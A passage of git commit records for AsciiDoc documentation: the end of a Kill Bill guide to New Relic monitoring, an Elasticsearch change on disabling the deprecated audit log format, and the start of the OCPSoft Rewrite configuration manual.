name and email address to sign up.\n\nYou should see the New Relic main page. To get back to this page at a future time you can click the words *New Relic One* in the upper left corner.\n\nTo set up New Relic to manage the metrics available from Kill Bill, there\nare just two steps: (1) install the New Relic agent in Kill Bill, and (2)\nedit a configuration file to enable the transfer of the complete Kill Bill metrics.\n\n== Install the Agent\n\nThe first step in integrating an analysis tool (like New Relic) and a\nsource of data to analyze (like Kill Bill) is to set up a means to get\nthe source to send its data to the analyzer. New Relic does this by\ninstalling the *New Relic Agent* in the system producing the data.\n\n1. In the main New Relic page, select the button labeled *Add Some Data*. If this button does not appear, select *+ Add More Data* in the upper right corner. \n2. An overlay pane should appear. At the top of this pane select *Guided Install*.\n3. The next pane is headed *Installation Plan*. Make sure the *Auto-Discovery* tab is selected, then choose *Linux*.\n4. The next pane summarizes what you have selected. 
Click on *Begin Installation*. You will see the following page:\n\nimage::metrics-newrelic-installation.png[align=center]\n\n[start=5]\n. In the box containing the install command, click *Copy Command*. The command will be copied to your clipboard.\n\n[NOTE]\nThis command includes the API key assigned to you by\nNew Relic. This authorizes the agent to do its job. This is your *user* API Key, and should not be confused with the key you will use in the next step.\n\n[start=6]\n. To install the agent: \n\n.. Log in to your EC2 instance. \n.. Paste the saved install command into the Ubuntu command line. \n.. Press Enter. The installation should begin.\n\nYou will be presented with a list of options to install, as shown below. An additional option, Infrastructure Agent, is always installed.\n\n[start=7]\n. Press Enter to select all of the options.\n\nimage::metrics-newrelic-options.png[align=center]\n\n\nYou will be presented with several questions, including default answers.\n\n[start=8]\n. Press Enter after each question to select the defaults.\n\nFinally, you will be asked for the MySQL password.\n\n[start=9]\n. Type `root`.\n\nIf all goes well, each installation should report `success`.\n\n\n[NOTE]\n*Note:* If you are using the multi-tier installation, you will have multiple EC2\ninstances. The agent should be installed separately for each one.\n\n== Test the Installation\n\n. Return to the New Relic main page. \n. Select *Browse Data* from the top menu. \n. Select *Metrics* from the dropdown.\n\nYou should see a\nlong list of metrics! These are coming from your instances, but they\nonly describe the Ubuntu environment itself. You do not yet have the\nKill Bill metrics. To fix this, proceed to the next section.\n\n== Set Up the Authorization\n\nTo authorize the sending of the Kill Bill metrics, it is necessary to\nedit two lines in this file:\n\n ```\n \/var\/lib\/tomcat\/bin\/setenv2.sh\n ```\n\nThis file contains configuration information for `tomcat`, which manages the\nKill Bill web applications.\n\nThis is a small file. The two lines to be edited are:\n\n```\n-Dcom.killbill.newrelic.enable=false\n-Dcom.killbill.newrelic.apiKey=\n```\n\nThese should be changed to:\n\n```\n-Dcom.killbill.newrelic.enable=true\n-Dcom.killbill.newrelic.apiKey=Your-API-Key\n```\n\nThe API key to be added is called the *Insights Insert Key.* This is *not* the same as the user API Key contained in the command you\nused to install the agent.\n\nTo find the Insights Insert Key:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Click the symbol at the far upper right to open your account menu, then select *API keys*.\n3. On the page that appears, select *Insights Insert keys* at the lower right.\n4. In the *Insert Keys* column on the left, under the word *key* at the bottom, click *Show*.\n5. Manually copy the key to your clipboard, then paste it into the configuration file.\n\nAfter editing the file, go to your AWS EC2 dashboard and *reboot the\ninstance* so the new configuration file will be read. If you have more\nthan one instance, follow the same procedure for each one.\n\nNow return to the *Metrics\/Summary* page. After a short delay, you\nshould see a lot more metrics; well over 1,000 in your list.\n\nCongratulations. Your New Relic integration is complete!\n\n== Using New Relic\n\nThe New Relic site has lots of https:\/\/docs.newrelic.com\/docs\/[documentation], so we won't\nrepeat any of that here. 
We will just suggest a few quick steps to get\nstarted:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Select *Browse Data* in the menu and *Metrics* in the submenu. A list of available metrics will appear on the left.\n3. Select some metrics to see the graph (chart) they produce. Identify the ones you would like to see together in a dashboard.\n4. To create a dashboard, close the metrics page, select *Dashboards* in the menu, and click *+ Create a Dashboard*.\n5. Select *Create New Dashboard*, give it a name, and click *Create*.\n\nYou can add charts to your dashboard for any metrics you choose. The charts can be edited, deleted, and rearranged. Your dashboard will appear under the *Dashboards* menu item. Have fun and good luck!\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a88c050a05cc2727225497cbe2ce16f0c5a1766f","subject":"Docs be explicit on how to turn off deprecated auditing (#37316)","message":"Docs be explicit on how to turn off deprecated auditing (#37316)\n\nJust be explicit about turning off the deprecated audit log appender\r\nbecause we really want people to turn it off.","repos":"coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/auditing\/output-logfile.asciidoc","new_file":"x-pack\/docs\/en\/security\/auditing\/output-logfile.asciidoc","new_contents":"[role=\"xpack\"]\n[[audit-log-output]]\n=== Logfile audit output\n\nThe `logfile` audit output is the default output for auditing. It writes data to\nthe `<clustername>_audit.log` file in the logs directory. To maintain\ncompatibility with releases prior to 6.5.0, a `<clustername>_access.log` file\nis also generated. They differ in the output format but the contents\nare similar. 
For systems that are not ingesting the audit file for search or\nanalytics, it is strongly recommended to keep only the newer format.\n\nTo turn off the deprecated output format, you can disable the logger in the\n`log4j2.properties` file: \n\n[source, properties]\n--------------------------------------------------\n# change info to off\n# logger.xpack_security_audit_deprecated_logfile.level = info\nlogger.xpack_security_audit_deprecated_logfile.level = off\n--------------------------------------------------\n\nAlternatively, use the\n{ref}\/cluster-update-settings.html[cluster update settings API] to dynamically\nconfigure the logger:\n\n[source,js]\n--------------------------------------------------\nPUT \/_cluster\/settings\n{\n  \"persistent\": {\n    \"logger.org.elasticsearch.xpack.security.audit.logfile.DeprecatedLoggingAuditTrail\": \"off\"\n  }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNOTE: If you overwrite the `log4j2.properties` and do not specify appenders for\nany of the audit trails, audit events are forwarded to the root appender, which\nby default points to the `elasticsearch.log` file.\n\n\n[float]\n[[audit-log-entry-format]]\n=== Log entry format\n\nThe log entries in the `<clustername>_audit.log` file have the following format:\n\n- Each log entry is a one-line JSON document and each one is printed on a separate line.\n- The fields of a log entry are ordered. However, if a field does not have a value it\n  will not be printed. The precise line pattern, together with the complete field\n  order, are specified in the `log4j2.properties` config file.\n- The log entry does not contain nested inner JSON objects, i.e. the doc is flat.\n- The field names follow a dotted notation to flatten inner objects.\n- A field's value can be a string, a number or an array of strings.\n- A field's value, a request body as well, will be escaped as per the JSON RFC 4627.\n\nThere is a list of <<audit-event-types, audit event types>> specifying the\nset of fields for each log entry type.\n\n[float]\n[[deprecated-audit-log-entry-format]]\n=== Deprecated log entry format\n\nThe log entries in the `<clustername>_access.log` file have the following format:\n\n[source,txt]\n----------------------------------------------------------------------------\n[<timestamp>] [<local_node_info>] [<layer>] [<entry_type>] <attribute_list>\n----------------------------------------------------------------------------\n\n`<timestamp>`       :: When the event occurred. You can configure the\n                       timestamp format in `log4j2.properties`.\n`<local_node_info>` :: Information about the local node that generated\n                       the log entry. You can control what node information\n                       is included by configuring the\n                       {ref}\/auditing-settings.html#node-audit-settings[local node info settings].\n`<layer>`           :: The layer from which this event originated:\n                       `rest`, `transport` or `ip_filter`.\n`<entry_type>`      :: The type of event that occurred: `anonymous_access_denied`,\n                       `authentication_failed`, `access_denied`, `access_granted`,\n                       `connection_granted`, `connection_denied`.\n`<attribute_list>`  :: A comma-separated list of key-value pairs that contain\n                       data pertaining to the event. Formatted as\n                       `attr1=[val1], attr2=[val2]`. 
See <<audit-event-attributes,\n Audit Entry Attributes>> for the attributes that can be included\n for each type of event.\n\n[float]\n[[audit-log-settings]]\n=== Logfile output settings\n\nThe events and some other information about what gets logged can be\ncontrolled using settings in the `elasticsearch.yml` file. See\n{ref}\/auditing-settings.html#event-audit-settings[Audited Event Settings] and\n{ref}\/auditing-settings.html#node-audit-settings[Local Node Info Settings].\n\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n\n[[logging-file]]\nYou can also configure how the logfile is written in the `log4j2.properties`\nfile located in `ES_PATH_CONF`. By default, audit information is appended to the\n`<clustername>_audit.log` file located in the standard Elasticsearch `logs` directory\n(typically located at `$ES_HOME\/logs`). The file rolls over on a daily basis.\nThe deprecated logfile audit format (`<clustername>_access.log`) can be disabled\nfrom the same `log4j2.properties` file (hint: look for the comment\ninstructing to set the log level to `off`). The deprecated format is a duplication\nof information that is in place to assure backwards compatibility. If you are\nnot strict about the audit format it is strongly recommended to only use the\n`<clustername>_audit.log` log appender.\n\n[float]\n[[audit-log-ignore-policy]]\n=== Logfile audit events ignore policies\n\nThe comprehensive audit trail is necessary to ensure accountability. It offers tremendous\nvalue during incident response and can even be required for demonstrating compliance.\n\nThe drawback of an audited system is represented by the inevitable performance penalty incurred.\nIn all truth, the audit trail spends _I\/O ops_ that are not available anymore for the user's queries.\nSometimes the verbosity of the audit trail may become a problem that the event type restrictions,\n<<audit-log-settings, defined by `include` and `exclude`>>, will not alleviate.\n\n*Audit events ignore policies* are a finer way to tune the verbosity of the audit trail.\nThese policies define rules that match audit events which will be _ignored_ (read as: not printed).\nRules match on the values of attributes of audit events and complement the <<audit-log-settings, include\/exclude>> method.\nImagine the corpus of audit events and the policies chopping off unwanted events.\n\nIMPORTANT: When utilizing audit events ignore policies you are acknowledging potential\naccountability gaps that could render illegitimate actions undetectable.\nPlease take time to review these policies whenever your system architecture changes.\n\nA policy is a named set of filter rules. Each filter rule applies to a single event attribute,\none of the `users`, `realms`, `roles` or `indices` attributes. The filter rule defines\na list of {ref}\/query-dsl-regexp-query.html#regexp-syntax[Lucene regexp], *any* of which has to match the value of the audit\nevent attribute for the rule to match.\nA policy matches an event if *all* the rules comprising it match the event.\nAn audit event is ignored, therefore not printed, if it matches *any* policy. All other\nnon-matching events are printed as usual.\n\nAll policies are defined under the `xpack.security.audit.logfile.events.ignore_filters`\nsettings namespace. 
For example, the following policy named _example1_ matches\nevents from the _kibana_ or _admin_user_ principals **and** operating over indices of the\nwildcard form _app-logs*_:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example1:\n    users: [\"kibana\", \"admin_user\"]\n    indices: [\"app-logs*\"]\n----------------------------\n\nAn audit event generated by the _kibana_ user and operating over multiple indices,\nsome of which do not match the indices wildcard, will not match.\nAs expected, operations generated by all other users (even operating only on indices that\nmatch the _indices_ filter) will not match this policy either.\n\nAudit events of different types may have <<audit-event-attributes, different attributes>>.\nIf an event does not contain an attribute for which some policy defines filters, the\nevent will not match the policy.\nFor example, the following policy named _example2_ will never match `authentication_success` or\n`authentication_failed` events, irrespective of the user's roles, because these\nevent schemas do not contain the `role` attribute:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example2:\n    roles: [\"admin\", \"ops_admin_*\"]\n----------------------------\n\nLikewise, any events of users with multiple roles, some of which do not match the\nregexps, will not match this policy.\n\nFor completeness, although practical use cases should be sparse, a filter can match\na missing attribute of an event, using the empty string (\"\") or the empty list ([]).\nFor example, the following policy will match events that do not have the `indices`\nattribute (`anonymous_access_denied`, `authentication_success` and other types) as well\nas events over the _next_ index.\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example3:\n    indices: [\"next\", \"\"]\n----------------------------\n","old_contents":"[role=\"xpack\"]\n[[audit-log-output]]\n=== Logfile audit output\n\nThe `logfile` audit output is the default output for auditing. It writes data to\nthe `<clustername>_audit.log` file in the logs directory. To maintain\ncompatibility with releases prior to 6.5.0, a `<clustername>_access.log` file\nis also generated. They differ in the output format but the contents\nare similar. For systems that are not ingesting the audit file for search or\nanalytics, it is strongly recommended to only keep the newer format.\nTurning off the deprecated output format can be achieved by disabling the logger\nin the `log4j2.properties` file (hint: there is a config comment\nabout it).\nFor more information, see {ref}\/logging.html#configuring-logging-levels[configuring-logging].\n\n\n[float]\n[[audit-log-entry-format]]\n=== Log entry format\n\nThe log entries in the `<clustername>_audit.log` file have the following format:\n\n- Each log entry is a one-line JSON document and each one is printed on a separate line.\n- The fields of a log entry are ordered. However, if a field does not have a value it\n  will not be printed. The precise line pattern, together with the complete field\n  order, are specified in the `log4j2.properties` config file.\n- The log entry does not contain nested inner JSON objects, i.e. 
the doc is flat.\n- The field names follow a dotted notation to flatten inner objects.\n- A field's value can be a string, a number or an array of strings.\n- A field's value, a request body as well, will be escaped as per the JSON RFC 4627.\n\nThere is a list of <<audit-event-types, audit event types>> specifying the\nset of fields for each log entry type.\n\n[float]\n[[deprecated-audit-log-entry-format]]\n=== Deprecated log entry format\n\nThe log entries in the `<clustername>_access.log` file have the following format:\n\n[source,txt]\n----------------------------------------------------------------------------\n[<timestamp>] [<local_node_info>] [<layer>] [<entry_type>] <attribute_list>\n----------------------------------------------------------------------------\n\n`<timestamp>`       :: When the event occurred. You can configure the\n                       timestamp format in `log4j2.properties`.\n`<local_node_info>` :: Information about the local node that generated\n                       the log entry. You can control what node information\n                       is included by configuring the\n                       {ref}\/auditing-settings.html#node-audit-settings[local node info settings].\n`<layer>`           :: The layer from which this event originated:\n                       `rest`, `transport` or `ip_filter`.\n`<entry_type>`      :: The type of event that occurred: `anonymous_access_denied`,\n                       `authentication_failed`, `access_denied`, `access_granted`,\n                       `connection_granted`, `connection_denied`.\n`<attribute_list>`  :: A comma-separated list of key-value pairs that contain\n                       data pertaining to the event. Formatted as\n                       `attr1=[val1], attr2=[val2]`. See <<audit-event-attributes,\n                       Audit Entry Attributes>> for the attributes that can be included\n                       for each type of event.\n\n[float]\n[[audit-log-settings]]\n=== Logfile output settings\n\nThe events and some other information about what gets logged can be\ncontrolled using settings in the `elasticsearch.yml` file. See\n{ref}\/auditing-settings.html#event-audit-settings[Audited Event Settings] and\n{ref}\/auditing-settings.html#node-audit-settings[Local Node Info Settings].\n\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n\n[[logging-file]]\nYou can also configure how the logfile is written in the `log4j2.properties`\nfile located in `ES_PATH_CONF`. By default, audit information is appended to the\n`<clustername>_audit.log` file located in the standard Elasticsearch `logs` directory\n(typically located at `$ES_HOME\/logs`). The file rolls over on a daily basis.\nThe deprecated logfile audit format (`<clustername>_access.log`) can be disabled\nfrom the same `log4j2.properties` file (hint: look for the comment\ninstructing to set the log level to `off`). The deprecated format is a duplication\nof information that is in place to assure backwards compatibility. If you are\nnot strict about the audit format it is strongly recommended to only use the\n`<clustername>_audit.log` log appender.\n\n[float]\n[[audit-log-ignore-policy]]\n=== Logfile audit events ignore policies\n\nThe comprehensive audit trail is necessary to ensure accountability. 
It offers tremendous\nvalue during incident response and can even be required for demonstrating compliance.\n\nThe drawback of an audited system is represented by the inevitable performance penalty incurred.\nIn all truth, the audit trail spends _I\/O ops_ that are not available anymore for the user's queries.\nSometimes the verbosity of the audit trail may become a problem that the event type restrictions,\n<<audit-log-settings, defined by `include` and `exclude`>>, will not alleviate.\n\n*Audit events ignore policies* are a finer way to tune the verbosity of the audit trail.\nThese policies define rules that match audit events which will be _ignored_ (read as: not printed).\nRules match on the values of attributes of audit events and complement the <<audit-log-settings, include\/exclude>> method.\nImagine the corpus of audit events and the policies chopping off unwanted events.\n\nIMPORTANT: When utilizing audit events ignore policies you are acknowledging potential\naccountability gaps that could render illegitimate actions undetectable.\nPlease take time to review these policies whenever your system architecture changes.\n\nA policy is a named set of filter rules. Each filter rule applies to a single event attribute,\none of the `users`, `realms`, `roles` or `indices` attributes. The filter rule defines\na list of {ref}\/query-dsl-regexp-query.html#regexp-syntax[Lucene regexp], *any* of which has to match the value of the audit\nevent attribute for the rule to match.\nA policy matches an event if *all* the rules comprising it match the event.\nAn audit event is ignored, therefore not printed, if it matches *any* policy. All other\nnon-matching events are printed as usual.\n\nAll policies are defined under the `xpack.security.audit.logfile.events.ignore_filters`\nsettings namespace. 
For example, the following policy named _example1_ matches\nevents from the _kibana_ or _admin_user_ principals **and** operating over indices of the\nwildcard form _app-logs*_:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example1:\n    users: [\"kibana\", \"admin_user\"]\n    indices: [\"app-logs*\"]\n----------------------------\n\nAn audit event generated by the _kibana_ user and operating over multiple indices,\nsome of which do not match the indices wildcard, will not match.\nAs expected, operations generated by all other users (even operating only on indices that\nmatch the _indices_ filter) will not match this policy either.\n\nAudit events of different types may have <<audit-event-attributes, different attributes>>.\nIf an event does not contain an attribute for which some policy defines filters, the\nevent will not match the policy.\nFor example, the following policy named _example2_ will never match `authentication_success` or\n`authentication_failed` events, irrespective of the user's roles, because these\nevent schemas do not contain the `role` attribute:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example2:\n    roles: [\"admin\", \"ops_admin_*\"]\n----------------------------\n\nLikewise, any events of users with multiple roles, some of which do not match the\nregexps, will not match this policy.\n\nFor completeness, although practical use cases should be sparse, a filter can match\na missing attribute of an event, using the empty string (\"\") or the empty list ([]).\nFor example, the following policy will match events that do not have the `indices`\nattribute (`anonymous_access_denied`, `authentication_success` and other types) as well\nas events over the _next_ index.\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n  example3:\n    indices: [\"next\", \"\"]\n----------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4af0f5250fd78c334a46ede6348e7dd314f6f6f3","subject":"Remove javadoc syntax","message":"Remove javadoc syntax\n","repos":"chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_contents":"== Rewrite Configuration Manual\n\nThere are many types of configuration objects in link:..\/[Rewrite], so we will take a few moments to define a few of the core terms before continuing to more advanced topics. Most of the core objects can be found in the +org.ocpsoft.rewrite.config+ package, while Servlet specific objects can be found in the +org.ocpsoft.rewrite.servlet.config+ package.\n\n=== Download and install\n\nBefore continuing on to learn about configuring Rewrite, make sure that you have already followed the link:.\/install[installation guide]. This will ensure that Rewrite is successfully set up in your application.\n\n=== The terminology\n\nIt may be helpful to review the following terms, many of which will make frequent appearances in this documentation.\n\nConfigurationProvider:: An object that provides +Configuration+ instances to the Rewrite framework; these may be created and registered as necessary. 
If not using link:.\/annotations\/index[Rewrite Annotations], or other extensions, you must have at least one registered +ConfigurationProvider+ or Rewrite will not have any effect.\n\nConfiguration:: A collection of +Rule+ objects that are processed in order until the system has determined the current inbound or outbound Rewrite event has been handled. Configurations may be provided by extensions, cached for performance, or built dynamically at run-time.\n\nConfigurationBuilder:: This is likely the object you will interact with most when configuring the Rewrite system. Start with a +ConfigurationBuilder+ in each situation where you find yourself in need of a +Configuration+ object; this class may be used to add pre-constructed, or construct custom +Rule+ instances for Rewrite.\n\nCondition:: Defines a requirement that must be met in order for rule evaluation to return true. You may create custom +Condition+ implementations. If creating custom implementations, you should likely extend +DefaultConditionBuilder+, which adds logical operators +.and()+, +.or()+, and +.not()+.\n\nOperation:: Defines behavior to be performed after evaluating a +Rewrite+ event. These objects may be as simple or as complex as desired, ranging from simple logging to request forwarding. Typically +Operation+ instances may be chained to achieve more complex tasks. If creating custom implementations, you should likely extend +DefaultOperationBuilder+, which adds logical chaining via +.and()+.\n\nParameter:: Specifies a fragment of an HTTP request that may be referenced in both +Condition+ and +Operation+ instances. Parameters are defined using the +.where()+ method of the +ConfigurationBuilder+, which is available once the first +Rule+ (with conditions or operations) has been added.\n\nRule:: A pre-constructed combination of +Condition+ and +Operation+ instances. You should use a +Rule+ when simple composition of +Condition+ and +Operation+ instances in a +ConfigurationBuilder+ is too difficult to achieve the desired functionality.\n\n=== Activate Development Mode\nBy default, Rewrite uses a +ConfigurationCacheProvider+ that stores your configuration in the +ServletContext+ as an application-wide caching medium. This means, by default, all registered +ConfigurationProvider+ instances will be loaded once upon application startup, and never again.\n\nTo disable the default caching mechanism, and enable configuration reloading on each request, add the following servlet context init parameter to +web.xml+:\n\n[source,xml]\n----\n<context-param>\n   <param-name>org.ocpsoft.rewrite.config.CONFIG_RELOADING<\/param-name>\n   <param-value>true<\/param-value>\n<\/context-param>\n----\nMake sure to disable this option before deploying to production, since larger and more complex configurations may take some time to re-load.\n\n=== Start using Rewrite rules\n\nNow that you have Rewrite installed, and understand the basic terms, let's start writing some rules. 
We will start with a simple example: logging an inbound request URL to the server console.\n\nFirst, open the +ConfigurationProvider+ you defined during link:install[installation] and add the desired logging statement using the +.addRule()+ method of +ConfigurationBuilder+.\n\n[source,java]\n.Log an inbound request to the server console\n----\npublic class ApplicationConfigurationProvider extends HttpConfigurationProvider\n{\n\n   @Override\n   public Configuration getConfiguration(ServletContext context)\n   {\n      return ConfigurationBuilder.begin()\n               .addRule()\n               .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n               .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n               .where(\"path\").matches(\".*\");\n   }\n\n}\n----\n\nBy default, parameters defined within the +Path+ condition match all characters except for forward slash \"+\/+\". To change this, we must configure the parameter manually. Once complete, our rule matches any inbound request, with any number of path segments.\n\nTIP: Parameter configuration can be used any time when parameters have been specified using the +ConfigurationBuilder+.\n\n[source,console]\n.Log output\n----\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\/bar\n...\n----\n\n[NOTE] \n====\nIf you attempt to configure a parameter that does not exist, you will quickly find out upon application startup; your deployment will halt with an exception:\n\n[source,console]\n----\n.where(\"foo\").matches(\".*\");\n...\njava.lang.IllegalArgumentException: No such parameter [ foo ] exists.\n----\n====\n\n==== A closer look\n\nNow that we have written a rule that uses a few different +Operation+ and +Condition+ objects, let's take a look at how the interaction works - we will break down the entire rule:\n\n[source,java]\n----\nConfigurationBuilder.begin()\n         .addRule()\n         .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n         .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n         .where(\"path\").matches(\".*\");\n----\n\n===== The breakdown\n+ConfigurationBuilder.begin().addRule()+:: Begins a new fluent +Configuration+ object and adds a fluent +Rule+\n\n`.when(Direction.isInbound().and(Path.matches(\"\/{path}\")))`:: Specifies that the rule should match only on inbound requests, and only when the request path matches the pattern `\/[^\/]+`, which is specified by our use of the parameter `{path}`\n\n`.perform(Log.message(Level.INFO, \"Client requested path: {path}\"))`:: Specify the +Operation+ to be performed when all conditions are met. Operations may be chained using the +.and()+ method available on most operation instances.\n\n`.where(\"path\").matches(\".*\")`:: Configures the +Parameter+ named \"+path+\", and specifies that it must match the link:http:\/\/ocpsoft.org\/opensource\/guide-to-regular-expressions-in-java-part-1\/[regular expression] pattern \"+.*+\"\n\n==== Add another operation\n\nNow say we wish to forward each inbound request to a Servlet or JSP that will handle the request and render a response for the client. We can achieve this by adding the +Forward+ operation to the set of operations to be performed when all rule conditions have been met. 
Forwards are purely internal operations, and the client browser URL will not be updated.\n\n[source,java]\n----\nConfigurationBuilder.begin()\n         .addRule()\n         .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n         .perform(Log.message(Level.INFO, \"Client requested path: {path}\")\n                  .and(Forward.to(\"\/Servlet?path={path}\")))\n         .where(\"path\").matches(\".*\");\n----\n\nNotice that we have specified a new Operation: +Forward.to(\"\/Servlet?path={path}\")+; this will again re-use the \"+path+\" parameter. The example below demonstrates how an inbound request will be forwarded to an inbound resource.\n\nTIP: Operations are performed in the order in which they are added to the rule, so make sure that breaking operations such as +Forward+, +Redirect+, +Substitute+, and +Lifecycle+ are added last, or your +Operation+ may not be performed.\n\n\n","old_contents":"== Rewrite Configuration Manual\n\nThere are many types of configuration objects in link:..\/[Rewrite], so we will take a few moments to define a few of the core terms before continuing to more advanced topics. Most of the core objects can be found in the +org.ocpsoft.rewrite.config+ package, while Servlet specific objects can be found in the +org.ocpsoft.rewrite.servlet.config+ package.\n\n=== Download and install\n\nBefore continuing on to learn about configuring Rewrite, make sure that you have already followed the link:.\/install[installation guide]. This will ensure that Rewrite is successfully set up in your application.\n\n=== The terminology\n\nIt may be helpful to review the following terms, many of which will make frequent appearances in this documentation.\n\nConfigurationProvider:: An object that provides +Configuration+ instances to the Rewrite framework; these may be created and registered as necessary. If not using link:.\/annotations\/index[Rewrite Annotations], or other extensions, you must have at least one registered +ConfigurationProvider+ or Rewrite will not have any effect.\n\nConfiguration:: A collection of +Rule+ objects that are processed in order until the system has determined the current inbound or outbound Rewrite event has been handled. Configurations may be provided by extensions, cached for performance, or built dynamically at run-time.\n\nConfigurationBuilder:: This is likely the object you will interact with most when configuring the Rewrite system. Start with a +ConfigurationBuilder+ in each situation where you find yourself in need of a +Configuration+ object; this class may be used to add pre-constructed, or construct custom +Rule+ instances for Rewrite.\n\nCondition:: Defines a requirement that must be met in order for rule evaluation to return true. You may create custom +Condition+ implementations. If creating custom implementations, you should likely extend +DefaultConditionBuilder+, which adds logical operators +.and()+, +.or()+, and +.not()+.\n\nOperation:: Defines behavior to be performed after evaluating a +Rewrite+ event. These objects may be as simple or as complex as desired, ranging from simple logging to request forwarding. Typically +Operation+ instances may be chained to achieve more complex tasks. If creating custom implementations, you should likely extend +DefaultOperationBuilder+, which adds logical chaining via +.and()+.\n\nParameter:: Specifies a fragment of an HTTP request that may be referenced in both +Condition+ and +Operation+ instances. 
Parameters are defined using the +.where()+ method of the +ConfigurationBuilder+, which is available once the first +Rule+ (with conditions or operations) has been added.\n\nRule:: A pre-constructed combination of +Condition+ and +Operation+ instances. You should use a +Rule+ when simple composition of +Condition+ and +Operation+ instances in a +ConfigurationBuilder+ is too difficult to achieve the desired functionality.\n\n=== Activate Development Mode\nBy default, Rewrite uses a +ConfigurationCacheProvider+ that stores your configuration in the +ServletContext+ as an application-wide caching medium. This means, by default, the +Configuration+ will be loaded once upon application startup, and never again.\n\nTo disable the default caching mechanism, and enable +Configuration+ reloading on each request, add the following servlet context init parameter to +web.xml+:\n\n[source,xml]\n----\n<context-param>\n   <param-name>org.ocpsoft.rewrite.config.CONFIG_RELOADING<\/param-name>\n   <param-value>true<\/param-value>\n<\/context-param>\n----\nMake sure to disable this option before deploying to production, since larger and more complex configurations may take some time to re-load.\n\n=== Start using Rewrite rules\n\nNow that you have Rewrite installed, and understand the basic terms, let's start writing some rules. We will start with a simple example: logging an inbound request URL to the server console.\n\nFirst, open the +ConfigurationProvider+ you defined during link:install[installation] and add the desired logging statement using the +.addRule()+ method of +ConfigurationBuilder+.\n\n[source,java]\n.Log an inbound request to the server console\n----\npublic class ApplicationConfigurationProvider extends HttpConfigurationProvider\n{\n\n   @Override\n   public Configuration getConfiguration(ServletContext context)\n   {\n      return ConfigurationBuilder.begin()\n               .addRule()\n               .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n               .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n               .where(\"path\").matches(\".*\");\n   }\n\n}\n----\n\nBy default, parameters defined within the +Path+ condition match all characters except for forward slash \"+\/+\". To change this, we must configure the parameter manually. 
Once complete, our rule matches any inbound request, with any number of path segments.\n\nTIP: Parameter configuration can be used any time when parameters have been specified using the +ConfigurationBuilder+.\n\n[source,console]\n.Log output\n----\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\/bar\n...\n----\n\n[NOTE] \n====\nIf you attempt to configure a parameter that does not exist, you will quickly find out upon application startup; your deployment will halt with an exception:\n\n[source,console]\n----\n.where(\"foo\").matches(\".*\");\n...\njava.lang.IllegalArgumentException: No such parameter [ foo ] exists.\n----\n====\n\n==== A closer look\n\nNow that we have written a rule that uses a few different +Operation+ and +Condition+ objects, let's take a look at how the interaction works - we will break down the entire rule:\n\n[source,java]\n----\nConfigurationBuilder.begin()\n         .addRule()\n         .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n         .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n         .where(\"path\").matches(\".*\");\n----\n\n===== The breakdown\n+ConfigurationBuilder.begin().addRule()+:: Begins a new fluent +Configuration+ object and adds a fluent +Rule+\n\n`.when(Direction.isInbound().and(Path.matches(\"\/{path}\")))`:: Specifies that the rule should match only on inbound requests, and only when the request path matches the pattern `\/[^\/]+`, which is specified by our use of the parameter `{path}`\n\n`.perform(Log.message(Level.INFO, \"Client requested path: {path}\"))`:: Specify the +Operation+ to be performed when all conditions are met. Operations may be chained using the +.and()+ method available on 